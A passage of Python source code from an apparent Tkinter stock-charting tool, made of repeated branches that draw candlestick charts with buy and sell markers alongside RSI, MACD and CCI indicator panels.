canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MOVING AVERAGE vs BOLLINGER BAND vs RSI --
elif grabstrategy == str(66):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.RSI, LW = 1.)
ax2.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha='0.3')
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MOVING AVERAGE vs BOLLINGER BAND vs SUPER TREND --
elif grabstrategy == str(77):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
subplots.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#-------------------------------------------------
#--MOVING AVERAGE vs RSI vs MACD --
elif grabstrategy == str(88):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2, ax3 = fig.subplots(3, 1, sharex = True, gridspec_kw={'height_ratios': [1, 3, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
ax1.plot(np.arange(len(data)), data.MACD, LW = 1.)
ax1.plot(np.arange(len(data)), data.MACD_HIST, LW = 1.)
ax1.plot(np.arange(len(data)), data.MACD_SIGNAL, LW = 1.)
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
candlestick2_ohlc(ax2, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax2.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax2.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax3.plot(np.arange(len(data)), data.RSI, LW = 1.)
ax3.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha='0.3')
ax3.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MOVING AVERAGE vs RSI vs SUPERTREND --
elif grabstrategy == str(99):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.RSI, LW = 1.)
ax2.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha='0.3')
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MOVING AVERAGE vs MACD vs SUPERTREND --
elif grabstrategy == str(111):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.MACD, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, LW = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MACD vs SUPERTREND vs RSI --
elif grabstrategy == str(222):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2, ax3 = fig.subplots(3, 1, sharex = True, gridspec_kw={'height_ratios': [1, 3, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
ax1.plot(np.arange(len(data)), data.MACD, LW = 1.)
ax1.plot(np.arange(len(data)), data.MACD_HIST, LW = 1.)
ax1.plot(np.arange(len(data)), data.MACD_SIGNAL, LW = 1.)
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
candlestick2_ohlc(ax2, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax2.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax2.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax3.plot(np.arange(len(data)), data.RSI, LW = 1.)
ax3.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha='0.3')
ax3.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MACD vs SUPERTREND vs BOLLINGER BAND --
elif grabstrategy == str(333):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.MACD, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, LW = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--------------------------------------------------------------
#--MOVING AVERAGE vs BOLLINGER BAND vs MACD vs RSI --
elif grabstrategy == str(444):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2, ax3 = fig.subplots(3, 1, sharex = True, gridspec_kw={'height_ratios': [1, 3, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
ax1.plot(np.arange(len(data)), data.MACD, LW = 1.)
ax1.plot(np.arange(len(data)), data.MACD_HIST, LW = 1.)
ax1.plot(np.arange(len(data)), data.MACD_SIGNAL, LW = 1.)
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
candlestick2_ohlc(ax2, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax2.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax2.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax3.plot(np.arange(len(data)), data.RSI, LW = 1.)
ax3.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha='0.3')
ax3.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MOVING AVERAGE vs BOLLINGER BAND vs MACD vs SUPER TREND --
elif grabstrategy == str(555):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.MACD, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, LW = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MOVING AVERAGE vs BOLLINGER BAND vs MACD vs RSI vs SUPER TREND--
elif grabstrategy == str(666):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2, ax3 = fig.subplots(3, 1, sharex = True, gridspec_kw={'height_ratios': [1, 3, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
ax1.plot(np.arange(len(data)), data.MACD, LW = 1.)
ax1.plot(np.arange(len(data)), data.MACD_HIST, LW = 1.)
ax1.plot(np.arange(len(data)), data.MACD_SIGNAL, LW = 1.)
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
candlestick2_ohlc(ax2, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax2.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax2.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax3.plot(np.arange(len(data)), data.RSI, LW = 1.)
ax3.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha='0.3')
ax3.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(777):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2, ax3 = fig.subplots(3, 1, sharex = True, gridspec_kw={'height_ratios': [1, 3, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
ax1.plot(np.arange(len(data)), data.MACD, LW = 1.)
ax1.plot(np.arange(len(data)), data.MACD_HIST, LW = 1.)
ax1.plot(np.arange(len(data)), data.MACD_SIGNAL, LW = 1.)
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax1.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
candlestick2_ohlc(ax2, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax2.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax2.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax3.plot(np.arange(len(data)), data.RSI, LW = 1.)
ax3.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha='0.3')
ax3.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(888):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
ax2.plot(np.arange(len(data)), data.MACD, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, LW = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(999):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.RSI, LW = 1.)
ax2.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha='0.3')
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(1111):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.RSI, LW = 1., color = '#e64af0')
ax2.fill_between(data.index, y1=30, y2=70, color='#f6b4fa', alpha='0.3')
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(2222):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.MACD, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, LW = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(3333):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
subplots.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(4444):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.RSI, LW = 1., color = '#e64af0')
ax2.fill_between(data.index, y1=30, y2=70, color='#f6b4fa', alpha='0.3')
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(5555):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.CCI, LW = 1., color = '#e64af0')
ax2.fill_between(data.index, y1=-100, y2=100, color='#f6b4fa', alpha='0.3')
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(6666):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data['viewSignal'] = data.signal.diff()
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(7777):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.RSI, LW = 1., color = '#e64af0')
ax2.fill_between(data.index, y1=30, y2=70, color='#f6b4fa', alpha='0.3')
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(8888):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.CCI, LW = 1., color = '#e64af0')
ax2.fill_between(data.index, y1=-100, y2=100, color='#f6b4fa', alpha='0.3')
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(9999):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
subplots.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(11111):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
